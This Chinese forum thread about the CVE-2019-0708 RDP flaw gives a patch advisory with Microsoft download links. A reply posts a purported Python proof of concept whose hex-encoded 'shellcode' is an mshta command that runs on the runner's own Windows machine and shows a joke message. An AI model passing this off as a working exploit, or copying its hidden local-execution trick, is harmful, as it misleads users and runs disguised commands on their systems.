2019

Captain

微软公司于2019年5月14日发布重要安全公告（Windows RDP 远程代码执行高危漏洞），其操作系统远程桌面（Remote Desktop Services），俗称的3389服务存在严重安全漏洞（编号CVE-2019-0708）。

漏洞详情：
攻击者在没有任何授权的情况下，可以远程直接攻击操作系统开放的3389服务，在受害主机上执行恶意攻击行为，包括安装后门，查看、篡改隐私数据，创建拥有完全用户权限的新账户，影响范围从Windows XP到Windows 2008 R2。由于3389服务应用广泛且该漏洞利用条件低，只要服务端口开放即可，导致该漏洞影响和危害程度堪比2017年“WannaCry”。因此，微软额外为Windows XP、Windows 2003这些已经停止支持的系统发布了该漏洞的安全补丁。

影响系统版本：
Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP

升级微软官方补丁链接详情如下：

Windos XP、Windows 2003等老旧系统需及时更新系统版本或手动安装官方补丁：https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708
Windows 7、Windows 2008和Windows Server 2008 R2系统，及时安装官方安全补丁：https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708



补丁直链地址：

2003和XP

WIN2003  中文版（32位）
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe

WIN2003 中文版（64位）
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-chs_f2f949a9a764ff93ea13095a0aca1fc507320d3c.exe

Windows XP SP3 x86 中文版（32位）
http://download.windowsupdate.com/c/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe

Windows XP x64 版 SP2 英文版（64位）
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-enu_e2fd240c402134839cfa22227b11a5ec80ddafcf.exe


WIN7和2008R2

WIN7（32位）
http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x86_6f1319c32d5bc4caf2058ae8ff40789ab10bf41b.msu

WIN7（64位） 以及 2008R2
http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu


52.ht Captain 20190516整理，转载请务必保留此行
https://www.52.ht/thread-548340-1-1.html

dalaoa

you play basketball like caixukun

[ol]

#RDP Blue POC by k8gege

#Local:  Win7  (python)

#Target: Win2003 & Win2008 (open 3389)

import socket

import sys

import os

import platform

buf=""

buf+="\x03\x00\x00\x13" # TPKT, Version 3, lenght 19

buf+="\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00" # ITU-T Rec X.224

buf+="\x03\x00\x01\xd6" # TPKT, Version 3, lenght 470

buf+="\x02\xf0\x80" # ITU-T Rec X.224

buf+="\x7f\x65\x82\x01\x94\x04" #SERVICE T.125

buf+="\x01\x01\x04\x01\x01\x01\x01\xff"

buf+="\x30\x19\x02\x04\x00\x00\x00\x00"

buf+="\x02\x04\x00\x00\x00\x02\x02\x04"

buf+="\x00\x00\x00\x00\x02\x04\x00\x00"#COMMUNICATION

buf+="\x00\x01\x02\x04\x00\x00\x00\x00"

buf+="\x02\x04\x00\x00\x00\x01\x02\x02"

buf+="\xff\xff\x02\x04\x00\x00\x00\x02"

buf+="\x30\x19\x02\x04\x00\x00\x00\x01"# TPKT, Version 5, Lenght 12

buf+="\x02\x04\x00\x00\x00\x01\x02\x04"

buf+="\x00\x00\x00\x01\x02\x04\x00\x00"

buf+="\x00\x01\x02\x04\x00\x00\x00\x00"

buf+="\x02\x04\x00\x00\x00\x01\x02\x02"

buf+="\x04\x20\x02\x04\x00\x00\x00\x02"#MULTIPOINT

buf+="\x30\x1c\x02\x02\xff\xff\x02\x02"

buf+="\xfc\x17\x02\x02\xff\xff\x02\x04"

buf+="\x00\x00\x00\x01\x02\x04\x00\x00"

buf+="\x00\x00\x02\x04\x00\x00\x00\x01"

buf+="\x02\x02\xff\xff\x02\x04\x00\x00"

buf+="\x00\x02\x04\x82\x01\x33\x00\x05"

buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00"#message

buf+="\x08\x00\x10\x00\x01\xc0\x00\x44"

buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8"

buf+="\x00\x04\x00\x08\x00\x80\x02\xe0"

buf+="\x01\x01\xca\x03\xaa\x09\x04\x00"

buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f"# TPKT, Version 3, Lenght 12

buf+="\x00\x53\x00\x54\x00\x00\x00\x00"

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"

buf+="\x00\x00\x00\x00\x00\x04\x00\x00"

buf+="\x00\x00\x00\x00\x00\x0c\x00\x00"# TPKT, Version 8, Lenght 12

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"#nop

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"#ITU-T Rec X.224

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"

buf+="\x00\x01\xca\x01\x00\x00\x00\x00"

buf+="\x00\x10\x00\x07\x00\x01\x00\x30"

buf+="\x00\x30\x00\x30\x00\x30\x00\x30"

buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"#ITU-T Rec X.224

buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"

buf+="\x00\x30\x00\x30\x00\x30\x00\x30"

buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"

buf+="\x00\x30\x00\x30\x00\x00\x00\x00"

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"#ITU-T Rec X.224

buf+="\x00\x00\x00\x00\x00\x00\x00\x00"

buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c"

buf+="\x00\x0d\x00\x00\x00\x00\x00\x00"

buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00"

buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c"#ITU-T Rec X.224

buf+="\x00\x03\x00\x00\x00\x72\x64\x70"

buf+="\x64\x72\x00\x00\x00\x00\x00\x80"

buf+="\x80\x63\x6c\x69\x70\x72\x64\x72"

buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70"

buf+="\x73\x6e\x64\x00\x00\x00\x00\x00"

buf+="\xc0"

buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12

buf+="\x02\xf0\x80"  # ITU-T Rec X.224

buf+="\x04\x01\x00\x01\x00" # MULTIPOINT-COMMUNICATION-SERVICE T.125

buf+="\x03\x00\x00\x08" #TPKT, Version 3, Length 8

buf+="\x02\xf0\x80" # ITU-T Rec X.224

buf+="\x28" # MULTIPOINT-COMM-SERVICE T.125

buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12

buf+="\x02\xf0\x80" # ITU-T Rec X.224

buf+="\x38\x00\x06\x03\xef" # MULTIPOINT-COMM-SERVICE T.125

buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12

buf+="\x02\xf0\x80" #ITU-T Rec X.224

buf+="\x38\x00\x06\x03\xeb" # MULTIPOINT-COMM-SERVICE T.125

buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12

buf+="\x02\xf0\x80" #ITU-T Rec X.224

buf+="\x38\x00\x06\x03\xec"# MULTIPOINT-COMM-SERVICE T.125

buf+="\x03\x00\x00\x0c"  # TPKT, Version 3, Lenght 12

buf+="\x02\xf0\x80" #ITU-T Rec X.224

buf+="\x38\x00\x06\x03\xed"# MULTIPOINT-COMM-SERVICE T.125

buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12

buf+="\x02\xf0\x80" #ITU-T Rec X.224

buf+="\x38\x00\x06\x03\xee"# MULTIPOINT-COMM-SERVICE T.125

buf+="\x03\x00\x00\x0b" # TPKT, Version 3, Lenght 12

buf+="\x06\xd0\x00\x00\x12\x34\x00"  #ITU-T Rec X.224

buf2="\x23\x79\x6F\x75\x20\x70\x6C\x61\x79\x20"

buf2+="\x62\x61\x73\x6B\x65\x74\x62\x61\x6C\x6C"

buf2+="\x20\x6C\x69\x6B\x65\x20\x63\x61\x69\x78"

buf2+="\x75\x6B\x75\x6E\x23";

sc="\x6D\x73\x68\x74\x61\x20\x76\x62\x73\x63" #shellcode

sc+="\x72\x69\x70\x74\x3A\x6D\x73\x67\x62\x6F"

sc+="\x78\x28\x22\x79\x6F\x75\x20\x70\x6C\x61"

sc+="\x79\x20\x62\x61\x73\x6B\x65\x74\x62\x61"

sc+="\x6C\x6C\x20\x6C\x69\x6B\x65\x20\x63\x61"

sc+="\x69\x78\x75\x6B\x75\x6E\x21\x22\x2C\x36"

sc+="\x34\x2C\x22\x4B\x38\x67\x65\x67\x65\x3A"

sc+="\x22\x29\x28\x77\x69\x6E\x64\x6F\x77\x2E"

sc+="\x63\x6C\x6F\x73\x65\x29";

HOST = sys.argv[1]

PORT = 3389

print "Win2003 & Win2008 RDP POC"

print "Target: "+HOST

recexec=buf

for i in range(8):

    try:

         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

         s.connect((HOST,PORT))

         print "sending: %d bytes" % len(buf)

         s.send(buf)

         rec = s.recv(100)

         recexec=sc

         print "received: %d bytes" % len(rec)

         s.close()

         print ""

    except:

        if(platform.system()=="Windows"):

            os.system(recexec)[/ol]复制代码

dalaoa

有多少人去执行楼上的代码拉，成功的记得来回复下

勇气

dalaoa 发表于 2019-5-16 15:42

有多少人去执行楼上的代码拉，成功的记得来回复下
昨晚就执行了，不过没一个成功的，github上的k8gege

flyqie

感谢大佬，已经在win2003服务器上装了

Captain

flyqie 发表于 2019-5-16 16:30

感谢大佬，已经在win2003服务器上装了
用2003和2008的同学已经不多了

ahost

已经打上，谢谢提醒，微软良心